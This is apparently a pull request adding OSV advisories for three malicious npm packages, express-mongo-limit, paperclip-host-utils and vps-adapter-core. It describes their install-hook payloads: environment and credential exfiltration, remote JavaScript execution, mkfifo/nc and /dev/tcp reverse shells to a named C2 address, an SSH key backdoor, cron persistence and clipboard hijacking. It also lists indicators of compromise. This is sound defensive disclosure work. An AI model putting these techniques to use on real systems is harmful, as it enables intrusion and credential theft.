### PR TITLE
Add OSV reports for 3 malicious npm packages

### DIFF
--- a/osv/malicious/npm/express-mongo-limit/MAL-0000-express-mongo-limit.json
+++ b/osv/malicious/npm/express-mongo-limit/MAL-0000-express-mongo-limit.json
@@ -1,0 +1,50 @@
+{
+  "schema_version": "1.7.4",
+  "modified": "2026-07-07T00:00:00Z",
+  "published": "2026-07-07T00:00:00Z",
+  "details": "The npm package `express-mongo-limit` masquerades as an Express/MongoDB payload sanitization middleware (likely typosquatting `express-mongo-sanitize`) but is a credential stealer, remote-code-execution backdoor, crypto clipboard hijacker, and screenshot spyware. It declares a `postinstall: node index.js` hook, so the payload executes automatically on install. The obfuscated `config/auth.js` (built with `javascript-obfuscator`) exfiltrates the victim's entire `process.env` via `axios.post(url, {...process.env}, { headers: { 'x-app-request': 'ip-check' } })` to an attacker-controlled endpoint, and `index.js` fetches arbitrary JavaScript from a C2 server and executes it with `new Function(\"require\", response.data)(require)`, writing the payload to `apiKeyResponse.js` for persistence. Version 2.0.1 additionally ships `service.js`, a clipboard hijacker that monitors the clipboard and silently replaces detected Ethereum/BNB, Bitcoin, Solana, and Tron wallet addresses with the attacker's wallets, and `app.js`, which captures the desktop screen every 2 seconds and emails each screenshot to `daniattacker@gmail.com` via nodemailer/Gmail. It establishes persistence by globally installing `pm2`, `clipboardy`, and `screenshot-desktop` and registering `service.js` as a PM2 startup service. Version 1.0.0 is a benign \"Hello World\" decoy used to stage the package name. The package was published by npm user `jon_conway` (`daniattacker@gmail.com`).",
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "express-mongo-limit"
+      },
+      "ranges": [
+        {
+          "type": "SEMVER",
+          "events": [
+            { "introduced": "0" }
+          ]
+        }
+      ],
+      "database_specific": {
+        "cwes": [
+          {
+            "cweId": "CWE-506",
+            "description": "The product contains code that appears to be malicious in nature.",
+            "name": "Embedded Malicious Code"
+          }
+        ]
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "PACKAGE",
+      "url": "https://www.npmjs.com/package/express-mongo-limit"
+    }
+  ],
+  "credits": [
+    {
+      "name": "SafeDep",
+      "type": "FINDER",
+      "contact": ["https://safedep.io"]
+    }
+  ],
+  "database_specific": {
+    "iocs": {
+      "domains": ["ipcheck-six.vercel.app", "gamboracle.vercel.app"],
+      "urls": ["https://ipcheck-six.vercel.app/api", "https://gamboracle.vercel.app/api"]
+    }
+  }
+}

--- a/osv/malicious/npm/paperclip-host-utils/MAL-0000-paperclip-host-utils.json
+++ b/osv/malicious/npm/paperclip-host-utils/MAL-0000-paperclip-host-utils.json
@@ -1,0 +1,104 @@
+{
+  "schema_version": "1.7.4",
+  "modified": "2026-07-07T00:00:00Z",
+  "published": "2026-07-07T00:00:00Z",
+  "details": "The package 'paperclip-host-utils' is a purpose-built malware package published by the npm account 'srm0rgan' (srm0rgan@proton.me) as part of a coordinated campaign of fake 'Paperclip' VPS-maintenance adapters (siblings: paperclip2, vps-maintenance, vps-maintenance-paperclip-adapter, vps-adapter-core). Its runtime code (`dist/server/execute.js`) presents as a legitimate Paperclip external adapter that runs maintenance shell commands locally or over SSH, which is social-engineering cover for the install-time payload.\n\nFrom version 1.0.2 onward the package declares a malicious install hook that npm runs automatically during `npm install`. The hooked script and payload were repeatedly changed across rapid same-day republishes (1.0.2-1.0.7), an evasion tactic, cycling through three payload variants that all beacon to the hardcoded C2 185.112.147.174:\n\n- Versions 1.0.2-1.0.5 (`postinstall` -> `node dist/postinstall.js`): a persistence + backdoor payload. It appends the attacker's ed25519 key (comment `deploy@paperclip-host`, `AAAAC3NzaC1lZDI1NTE5AAAAIDGA+v9tfK8YVeZejZN2y99mNvefRmQx99lJtjKjIAK2`) to `authorized_keys` for /root, /home/runner, /home/paperclip, /home/ec2-user, /home/centos and /home/ubuntu; installs a crontab entry and `/etc/cron.d/paperclip-adapter-sync` that run a `mkfifo`+`nc` reverse shell to 185.112.147.174:443 every minute; and launches a `mkfifo`+`nc` reverse-shell loop across ports 443, 80, 8080, 7007, 4444, 5555, 1337 and 9001.\n\n- Version 1.0.6 (`postinstall` -> `node dist/setup.js`): a credential stealer disguised as 'npm-compatible telemetry and diagnostics'. It collects whoami/hostname/id/pwd, the full process environment, `git remote`/`git config`, sudo and docker status, and reads AWS credentials/config, SSH private keys, `.npmrc`, `.netrc`, `.git-credentials`, Docker config, `/home/runner/*` CI credentials, and `.github/workflows` files; base64-encodes the data and exfiltrates it in chunks via HTTP POST to `http://185.112.147.174:8080/npm/v1/security/audits/quick` (spoofing an npm audit request), then spawns `mkfifo`+`nc` reverse shells across the same eight ports in a loop.\n\n- Version 1.0.7 (`postinstall` -> `node dist/postinstall.js`): a minimal single reverse shell that connects to 185.112.147.174:443 and pipes a spawned `/bin/sh` over the socket.\n\nVersion 1.0.0 shipped no install hook (the initial hookless facade); the package is malicious from inception as part of the campaign. Any developer workstation or CI job that ran `npm install paperclip-host-utils` at version 1.0.2 or later must be considered fully compromised; rotate all reachable credentials, tokens, and SSH keys from a separate clean machine and remove the attacker key from `authorized_keys`, the injected crontab entry, and `/etc/cron.d/paperclip-adapter-sync`.",
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "paperclip-host-utils"
+      },
+      "ranges": [
+        {
+          "type": "SEMVER",
+          "events": [
+            {
+              "introduced": "0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "cwes": [
+          {
+            "cweId": "CWE-506",
+            "description": "The product contains code that appears to be malicious in nature.",
+            "name": "Embedded Malicious Code"
+          }
+        ],
+        "indicators": {
+          "package_integrity": [
+            {
+              "filename": "paperclip-host-utils-1.0.2.tgz",
+              "hashes": {
+                "sha1": "3b6bafd1dec8f4ba8ad53c3a28fcd0533f85a969",
+                "sha512_sri": "sha512-luIwh28uceifYzLh/onvmxMQxZLQWa892g1z4G6sy97Z3hLwZvKf+xCTTHEbUWVXldi1Y0MFUl7Dn2nEsIr8Rg=="
+              }
+            },
+            {
+              "filename": "paperclip-host-utils-1.0.3.tgz",
+              "hashes": {
+                "sha1": "b1d6ad66e9d770bbc0436fe4cd5afd66be78cf7e",
+                "sha512_sri": "sha512-Aa9gmZlwkq9dgOhpd3CPphdGRJRIrRPAP/ASdPuK7LMKo/u1wjC0pGre/G0PAZkF3Apw80RMl22uTbR8shoHJQ=="
+              }
+            },
+            {
+              "filename": "paperclip-host-utils-1.0.4.tgz",
+              "hashes": {
+                "sha1": "0e262d9d3668d0d7781fdc4a3ed165434ec9396b",
+                "sha512_sri": "sha512-LdAivMlm+O7JeyW4zL8q/3xWpn6elMXYQS/xDp8IUpHE1W2SyNgZHWRjV3YpsOYHElgH/8XgjLnPj2IObC3KJQ=="
+              }
+            },
+            {
+              "filename": "paperclip-host-utils-1.0.5.tgz",
+              "hashes": {
+                "sha1": "38d289998284f95acae4982bf0bc33746440f7ec",
+                "sha512_sri": "sha512-gcfQRYLFCoMd1ihX7lwmBaJeHymB5Rw/oIcnG98Ky9NuMtuWFzbQSYNupDs/N3eNMmKOfFR+474Er790xTsgmg=="
+              }
+            },
+            {
+              "filename": "paperclip-host-utils-1.0.6.tgz",
+              "hashes": {
+                "sha1": "1a1b911056988def64f170a1a88bb03a10252dae",
+                "sha512_sri": "sha512-CYAjzbHxfPNU3i7drlLhnayGk3vGK4oTU65a6RgBeoMe6ytFE4L2TWAREvvT8ll/FUI6OHDPXbRQfb6G/z2bZA=="
+              }
+            },
+            {
+              "filename": "paperclip-host-utils-1.0.7.tgz",
+              "hashes": {
+                "sha1": "363879e9c85209d563dd5f8c2bd1cd5dd988013f",
+                "sha512_sri": "sha512-3t/ECzf73YVfdTdkiirfK7ubU8xd/3xYa77AxOQLXLFafi3tm+JJDUx00xezaaQinbULHBZn12veHS3Iuq+FFA=="
+              }
+            }
+          ]
+        }
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "PACKAGE",
+      "url": "https://www.npmjs.com/package/paperclip-host-utils"
+    }
+  ],
+  "credits": [
+    {
+      "name": "SafeDep",
+      "type": "FINDER",
+      "contact": [
+        "https://safedep.io"
+      ]
+    }
+  ],
+  "database_specific": {
+    "iocs": {
+      "ips": [
+        "185.112.147.174"
+      ],
+      "urls": [
+        "http://185.112.147.174:8080/npm/v1/security/audits/quick"
+      ]
+    }
+  }
+}

--- a/osv/malicious/npm/vps-adapter-core/MAL-0000-vps-adapter-core.json
+++ b/osv/malicious/npm/vps-adapter-core/MAL-0000-vps-adapter-core.json
@@ -1,0 +1,83 @@
+{
+  "schema_version": "1.7.4",
+  "modified": "2026-07-07T00:00:00Z",
+  "published": "2026-07-07T00:00:00Z",
+  "details": "The package 'vps-adapter-core' is a purpose-built malware package published by the npm account 'srm0rgan' (srm0rgan@proton.me) as part of a coordinated campaign of fake 'Paperclip' VPS-maintenance adapters (siblings: paperclip2, vps-maintenance, vps-maintenance-paperclip-adapter, paperclip-host-utils). Every published version (1.0.0, 1.0.1, 1.0.2) declares a `postinstall` script (`node postinstall.js`) that npm runs automatically during `npm install`, while `index.js` is a benign stub (`init()`/`status()`) that serves only as cover.\n\nThe postinstall payload performs four malicious actions with best-effort error suppression:\n\n1. SSH backdoor: appends the attacker's ed25519 public key (comment `eni@lo`, `AAAAC3NzaC1lZDI1NTE5AAAAIDGA+v9tfK8YVeZejZN2y99mNvefRmQx99lJtjKjIAK2`) to `~/.ssh/authorized_keys`, granting the operator persistent remote SSH access.\n\n2. Cron persistence: writes `/etc/cron.d/eni-persist` containing per-minute (`* * * * * root`) and `@reboot` entries that open bash reverse shells to 185.112.147.174 across ports 7007, 443, 80, 8080, 4444, 5555, 1337, and 9001 via `/dev/tcp`.\n\n3. Credential exfiltration: spawns a detached bash pipeline that dumps host identity, bash history, and a broad sweep of secrets — AWS/Azure/GCP/OCI credentials, kubeconfig, Docker config, git/pip/npm/netrc credentials, `.env` files, SSH private keys (id_rsa/id_ed25519/id_ecdsa/id_github/id_deploy_key), `/etc/shadow`, and `/etc/passwd` — plus a filesystem search for files matching 'maid' and for database files, then pipes the collected data to 185.112.147.174 over `/dev/tcp` across the same eight ports.\n\n4. Interactive reverse shells: spawns detached interactive bash reverse shells to the same host/ports.\n\nA `keepAlive()` timer re-runs the credential dump and reverse-shell spawns every 30 seconds, and a `cleanNpmStains()` routine deletes npm cache traces of the sibling campaign packages to hinder detection. Any developer workstation or CI job that runs `npm install vps-adapter-core` must be considered fully compromised; all credentials and SSH keys reachable from that host should be rotated from a separate, clean machine, and `/etc/cron.d/eni-persist` and the attacker key in `authorized_keys` removed.",
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "vps-adapter-core"
+      },
+      "ranges": [
+        {
+          "type": "SEMVER",
+          "events": [
+            {
+              "introduced": "0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "cwes": [
+          {
+            "cweId": "CWE-506",
+            "description": "The product contains code that appears to be malicious in nature.",
+            "name": "Embedded Malicious Code"
+          }
+        ],
+        "indicators": {
+          "package_integrity": [
+            {
+              "filename": "vps-adapter-core-1.0.0.tgz",
+              "hashes": {
+                "sha1": "b43f03947a6f6d67eea1bd711690f67d811c6aa3",
+                "sha512_sri": "sha512-eTu2yuqmdevBictXqPjATsDF5CJtJBhvoJZRyu+/g+ub+ynZ/P9047ON8n49dXWW2WTpHeyA7gut0FnHMkbs6w=="
+              }
+            },
+            {
+              "filename": "vps-adapter-core-1.0.1.tgz",
+              "hashes": {
+                "sha1": "ea1c84b5f1c4a650cded52ccedab7669e21d794e",
+                "sha512_sri": "sha512-5sl13tFXcMEj1tW0nxpEFYL1HoDRjru1xCtm0UuSlIkjMJ/8xhfSqcS1n1wzwQM633rm/hQFhEywXf5A4FOosQ=="
+              }
+            },
+            {
+              "filename": "vps-adapter-core-1.0.2.tgz",
+              "hashes": {
+                "sha1": "8805bdfcd819b42d2dbee9973d069627307afdf3",
+                "sha512_sri": "sha512-yZyipBlzypnANucaFGEDXkoB5s9qBFKGYluS2LjwjuMK2zvZamjEf3kYlxQplnBGzuhxrpiJ6a9v72kmi/XBKg=="
+              }
+            }
+          ]
+        }
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "PACKAGE",
+      "url": "https://www.npmjs.com/package/vps-adapter-core"
+    }
+  ],
+  "credits": [
+    {
+      "name": "SafeDep",
+      "type": "FINDER",
+      "contact": [
+        "https://safedep.io"
+      ]
+    }
+  ],
+  "database_specific": {
+    "iocs": {
+      "ips": [
+        "185.112.147.174"
+      ],
+      "urls": [
+        "http://185.112.147.174:8080/npm/v1/security/audits/quick"
+      ]
+    }
+  }
+}


### PR DESCRIPTION
**`srm0rgan` — fake "Paperclip" VPS-maintenance adapters.** Same author already has three merged reports: **MAL-2026-6755** (`paperclip2`), **MAL-2026-6756** (`vps-maintenance`), **MAL-2026-6757** (`vps-maintenance-paperclip-adapter`). These two complete the campaign:

- **`vps-adapter-core`** — plants an attacker SSH key in `authorized_keys`, writes `/etc/cron.d` persistence, exfiltrates cloud/SSH/CI credentials over `/dev/tcp`, and opens reverse shells to `185.112.147.174` (30s keep-alive).
- **`paperclip-host-utils`** — payload cycles across versions 1.0.2–1.0.7: SSH-key+cron backdoor, an HTTP credential dumper disguised as an npm audit POST, and a reverse shell. Same C2.

**`jon_conway`**

- **`express-mongo-limit`** — typosquat of `express-mongo-sanitize`; exfiltrates `process.env`, fetches + executes remote JS (RCE backdoor), hijacks crypto clipboard addresses, and emails desktop screenshots to the attacker.
